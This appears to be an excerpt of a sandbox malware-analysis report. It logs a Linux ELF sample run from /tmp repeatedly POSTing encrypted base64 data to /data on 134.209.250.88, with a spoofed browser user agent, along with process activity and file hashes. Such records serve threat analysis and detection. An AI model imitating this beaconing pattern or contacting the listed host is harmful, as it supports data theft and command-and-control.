                                              Data Raw: 5a 54 5a 6c 4e 44 6c 69 4e 6a 49 74 4d 32 56 6a 5a 53 30 30 5a 6a 41 33 4c 54 67 7a 5a 54 55 74 59 54 68 6a 5a 47 55 78 4d 7a 45 31 4d 6a 45 35 74 73 42 44 56 4b 6f 79 71 49 4d 70 73 65 43 4e 4f 6f 47 38 4a 7a 74 67 77 59 37 37 37 6b 50 59 69 77 46 78 35 63 45 69 52 47 47 79 72 78 77 2f 48 61 63 74 69 49 78 4b 5a 55 6b 56 4d 55 58 63 79 41 32 30 34 4a 2f 6e 41 6b 47 53 31 55 69 50 45 7a 75 66 64 73 31 55 61 79 75 47 66 70 62 4c 69 6b 62 69 77 62 4c 75 77 31 53 2f 6e 62 79 72 56 6f 50 71 58 38 58 46 71 42 74 77 39 71 74 74
                                              Data Ascii: ZTZlNDliNjItM2VjZS00ZjA3LTgzZTUtYThjZGUxMzE1MjE5tsBDVKoyqIMpseCNOoG8JztgwY777kPYiwFx5cEiRGGyrxw/HactiIxKZUkVMUXcyA204J/nAkGS1UiPEzufds1UayuGfpbLikbiwbLuw1S/nbyrVoPqX8XFqBtw9qtt


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3192.168.2.1357570134.209.250.8880
                                              TimestampBytes transferredDirectionData
                                              Mar 18, 2025 09:06:04.163463116 CET415OUTPOST /data HTTP/1.1
                                              Host: 134.209.250.88
                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 220
                                              Accept-Encoding: gzip
                                              Connection: close
                                              Data Raw: 5a 54 5a 6c 4e 44 6c 69 4e 6a 49 74 4d 32 56 6a 5a 53 30 30 5a 6a 41 33 4c 54 67 7a 5a 54 55 74 59 54 68 6a 5a 47 55 78 4d 7a 45 31 4d 6a 45 35 74 51 50 37 70 42 39 45 49 6c 35 34 55 32 30 77 49 4a 79 6c 70 61 55 6e 39 45 31 66 50 70 4a 30 4d 69 6b 4f 59 7a 72 68 58 4b 62 71 36 56 77 53 54 48 35 33 43 7a 31 6e 38 53 76 67 69 56 62 76 31 48 44 49 4d 78 55 6b 77 64 63 61 4f 66 56 45 6c 41 70 6e 36 43 50 63 33 50 69 58 77 4c 52 4d 79 55 6e 68 79 72 41 30 36 49 77 57 42 4d 46 53 58 5a 50 76 50 6f 6d 30 36 39 33 79 6c 41 4d 56 4f 37 6a 78 2b 4b 42 4e 62 4e 4b 49 57 6a 73 6c 4d 6d 57 39 41 71 2f 6b 44 48 50 39 66 54 67 41 63 78 72 4e 4a 73 6e 46 4d 75 59 3d
                                              Data Ascii: ZTZlNDliNjItM2VjZS00ZjA3LTgzZTUtYThjZGUxMzE1MjE5tQP7pB9EIl54U20wIJylpaUn9E1fPpJ0MikOYzrhXKbq6VwSTH53Cz1n8SvgiVbv1HDIMxUkwdcaOfVElApn6CPc3PiXwLRMyUnhyrA06IwWBMFSXZPvPom0693ylAMVO7jx+KBNbNKIWjslMmW9Aq/kDHP9fTgAcxrNJsnFMuY=
                                              Mar 18, 2025 09:06:04.826915026 CET457INHTTP/1.1 200 OK
                                              Cache-Control: max-age=0, no-cache
                                              Content-Length: 176
                                              Content-Type: application/javascript; charset=utf-8
                                              Content-Type: application/octet-stream
                                              Date: Tue, 18 Mar 2025 08:06:04 GMT
                                              Pragma: no-cache
                                              Server: NetDNA-cache/2.2
                                              Connection: close
                                              Data Raw: 5a 54 5a 6c 4e 44 6c 69 4e 6a 49 74 4d 32 56 6a 5a 53 30 30 5a 6a 41 33 4c 54 67 7a 5a 54 55 74 59 54 68 6a 5a 47 55 78 4d 7a 45 31 4d 6a 45 35 59 39 58 58 49 34 56 72 41 69 37 36 4e 48 37 79 74 6a 68 59 2b 78 63 64 63 5a 53 41 69 66 57 58 65 6a 61 67 47 4c 72 69 77 45 6e 4e 6c 4f 64 76 45 5a 51 2b 69 64 38 50 4b 41 65 68 62 65 6b 6f 68 64 77 61 57 70 6c 6c 46 32 38 61 46 70 65 6d 62 57 4b 6b 64 49 71 7a 77 63 43 62 69 56 30 72 52 62 67 43 54 69 52 7a 74 72 2b 69 56 35 4e 64 47 32 72 39 49 43 2b 74 43 72 37 62 78 5a 69 67
                                              Data Ascii: ZTZlNDliNjItM2VjZS00ZjA3LTgzZTUtYThjZGUxMzE1MjE5Y9XXI4VrAi76NH7ytjhY+xcdcZSAifWXejagGLriwEnNlOdvEZQ+id8PKAehbekohdwaWpllF28aFpembWKkdIqzwcCbiV0rRbgCTiRztr+iV5NdG2r9IC+tCr7bxZig


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4192.168.2.1357572134.209.250.8880
                                              TimestampBytes transferredDirectionData
                                              Mar 18, 2025 09:06:14.847944021 CET415OUTPOST /data HTTP/1.1
                                              Host: 134.209.250.88
                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 220
                                              Accept-Encoding: gzip
                                              Connection: close
                                              Data Raw: 5a 54 5a 6c 4e 44 6c 69 4e 6a 49 74 4d 32 56 6a 5a 53 30 30 5a 6a 41 33 4c 54 67 7a 5a 54 55 74 59 54 68 6a 5a 47 55 78 4d 7a 45 31 4d 6a 45 35 30 2b 36 55 6c 33 31 61 4d 71 69 6e 35 36 41 34 50 6c 53 68 33 76 56 6f 49 57 6b 63 66 41 7a 6f 34 54 75 36 35 4e 6f 46 6a 78 6d 6e 50 4e 46 72 43 2b 63 30 6d 4c 37 4d 6a 7a 49 53 47 74 38 52 5a 46 64 57 52 2f 50 70 4d 44 2f 38 57 54 34 54 49 30 70 6f 43 4a 44 66 69 54 54 70 62 4f 69 6b 77 66 41 36 43 41 36 2b 57 30 44 34 50 34 6b 36 43 65 4f 32 52 2f 36 45 54 6c 6e 5a 65 2f 6d 63 66 72 6e 4d 33 50 44 4c 52 37 44 55 33 48 5a 4b 50 4b 78 78 7a 5a 74 69 45 56 4a 48 43 4a 59 66 59 76 57 41 38 38 6a 79 67 33 38 3d
                                              Data Ascii: ZTZlNDliNjItM2VjZS00ZjA3LTgzZTUtYThjZGUxMzE1MjE50+6Ul31aMqin56A4PlSh3vVoIWkcfAzo4Tu65NoFjxmnPNFrC+c0mL7MjzISGt8RZFdWR/PpMD/8WT4TI0poCJDfiTTpbOikwfA6CA6+W0D4P4k6CeO2R/6ETlnZe/mcfrnM3PDLR7DU3HZKPKxxzZtiEVJHCJYfYvWA88jyg38=
                                              Mar 18, 2025 09:06:15.477344990 CET457INHTTP/1.1 200 OK
                                              Cache-Control: max-age=0, no-cache
                                              Content-Length: 176
                                              Content-Type: application/javascript; charset=utf-8
                                              Content-Type: application/octet-stream
                                              Date: Tue, 18 Mar 2025 08:06:15 GMT
                                              Pragma: no-cache
                                              Server: NetDNA-cache/2.2
                                              Connection: close
                                              Data Raw: 5a 54 5a 6c 4e 44 6c 69 4e 6a 49 74 4d 32 56 6a 5a 53 30 30 5a 6a 41 33 4c 54 67 7a 5a 54 55 74 59 54 68 6a 5a 47 55 78 4d 7a 45 31 4d 6a 45 35 39 6c 34 4e 4e 57 70 31 52 6b 41 37 35 36 6d 52 37 39 4e 62 36 63 45 6a 56 4f 72 4e 6e 41 44 4a 66 61 54 51 34 72 41 4d 66 73 4e 70 7a 72 59 43 4a 4f 33 5a 63 65 69 38 45 51 75 77 4f 38 4f 37 4e 6d 6c 7a 6b 33 62 31 43 72 76 6f 4c 2f 33 33 48 70 5a 30 58 6d 6d 4b 65 71 31 41 55 78 43 6f 44 74 72 44 2f 4a 58 66 6c 49 2f 41 33 42 53 55 72 72 50 6e 54 4a 76 41 30 39 55 7a 61 74 4c 64
                                              Data Ascii: ZTZlNDliNjItM2VjZS00ZjA3LTgzZTUtYThjZGUxMzE1MjE59l4NNWp1RkA756mR79Nb6cEjVOrNnADJfaTQ4rAMfsNpzrYCJO3Zcei8EQuwO8O7Nmlzk3b1CrvoL/33HpZ0XmmKeq1AUxCoDtrD/JXflI/A3BSUrrPnTJvA09UzatLd


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5192.168.2.1357574134.209.250.8880
                                              TimestampBytes transferredDirectionData
                                              Mar 18, 2025 09:06:25.488946915 CET415OUTPOST /data HTTP/1.1
                                              Host: 134.209.250.88
                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 220
                                              Accept-Encoding: gzip
                                              Connection: close
                                              Data Raw: 5a 54 5a 6c 4e 44 6c 69 4e 6a 49 74 4d 32 56 6a 5a 53 30 30 5a 6a 41 33 4c 54 67 7a 5a 54 55 74 59 54 68 6a 5a 47 55 78 4d 7a 45 31 4d 6a 45 35 7a 4f 37 55 4f 79 53 50 70 4d 4f 31 36 4d 68 33 55 4c 41 54 31 69 4a 78 62 36 55 6f 54 49 34 36 77 72 32 50 65 4c 45 6c 35 33 34 30 52 48 74 78 44 30 59 53 50 4f 36 5a 4f 74 38 57 51 58 38 36 6b 54 4c 46 72 35 36 41 33 45 59 68 77 6f 63 56 78 57 39 2b 43 2b 6c 34 75 32 35 68 78 75 4d 4f 30 68 4b 59 46 5a 35 4b 41 64 48 33 79 61 73 62 63 77 55 41 4c 77 62 63 30 2f 36 62 49 66 32 4d 33 6a 64 59 42 43 4d 41 41 38 42 57 41 43 42 31 73 33 49 66 63 53 6e 38 54 43 73 46 49 38 45 7a 69 4a 48 51 4d 63 38 55 49 43 41 3d
                                              Data Ascii: ZTZlNDliNjItM2VjZS00ZjA3LTgzZTUtYThjZGUxMzE1MjE5zO7UOySPpMO16Mh3ULAT1iJxb6UoTI46wr2PeLEl5340RHtxD0YSPO6ZOt8WQX86kTLFr56A3EYhwocVxW9+C+l4u25hxuMO0hKYFZ5KAdH3yasbcwUALwbc0/6bIf2M3jdYBCMAA8BWACB1s3IfcSn8TCsFI8EziJHQMc8UICA=
                                              Mar 18, 2025 09:06:26.114597082 CET457INHTTP/1.1 200 OK
                                              Cache-Control: max-age=0, no-cache
                                              Content-Length: 176
                                              Content-Type: application/javascript; charset=utf-8
                                              Content-Type: application/octet-stream
                                              Date: Tue, 18 Mar 2025 08:06:26 GMT
                                              Pragma: no-cache
                                              Server: NetDNA-cache/2.2
                                              Connection: close
                                              Data Raw: 5a 54 5a 6c 4e 44 6c 69 4e 6a 49 74 4d 32 56 6a 5a 53 30 30 5a 6a 41 33 4c 54 67 7a 5a 54 55 74 59 54 68 6a 5a 47 55 78 4d 7a 45 31 4d 6a 45 35 47 50 6b 6e 79 52 33 6d 4b 71 52 2b 62 4c 75 38 44 47 35 6c 6a 79 74 43 48 67 77 41 47 4b 57 54 70 63 78 4a 38 66 4b 78 2f 49 2b 56 64 34 44 49 63 4e 71 72 68 55 33 4c 54 4e 59 35 4c 50 74 64 6d 74 4c 77 46 63 72 45 39 4c 61 51 79 61 69 66 74 38 2f 4a 6d 57 57 50 64 2f 77 6a 58 4a 48 39 68 31 6d 34 6e 6c 71 69 49 66 4c 43 77 2b 52 74 77 6a 65 39 41 6f 76 4c 48 51 70 32 39 64 35 72
                                              Data Ascii: ZTZlNDliNjItM2VjZS00ZjA3LTgzZTUtYThjZGUxMzE1MjE5GPknyR3mKqR+bLu8DG5ljytCHgwAGKWTpcxJ8fKx/I+Vd4DIcNqrhU3LTNY5LPtdmtLwFcrE9LaQyaift8/JmWWPd/wjXJH9h1m4nlqiIfLCw+Rtwje9AovLHQp29d5r


                                              System Behavior

                                              Start time (UTC):08:05:38
                                              Start date (UTC):18/03/2025
                                              Path:/usr/bin/dash
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):08:05:38
                                              Start date (UTC):18/03/2025
                                              Path:/usr/bin/rm
                                              Arguments:rm -f /tmp/tmp.SqAm2DyCXO /tmp/tmp.TTarPVIarB /tmp/tmp.qnq7hGh9Cv
                                              File size:72056 bytes
                                              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                              Start time (UTC):08:05:38
                                              Start date (UTC):18/03/2025
                                              Path:/usr/bin/dash
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):08:05:38
                                              Start date (UTC):18/03/2025
                                              Path:/usr/bin/rm
                                              Arguments:rm -f /tmp/tmp.SqAm2DyCXO /tmp/tmp.TTarPVIarB /tmp/tmp.qnq7hGh9Cv
                                              File size:72056 bytes
                                              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                              Start time (UTC):08:05:47
                                              Start date (UTC):18/03/2025
                                              Path:/tmp/2gkeFl1jcj.elf
                                              Arguments:/tmp/2gkeFl1jcj.elf
                                              File size:14045800 bytes
                                              MD5 hash:333079089b8587563de0ff1e8f5a18b0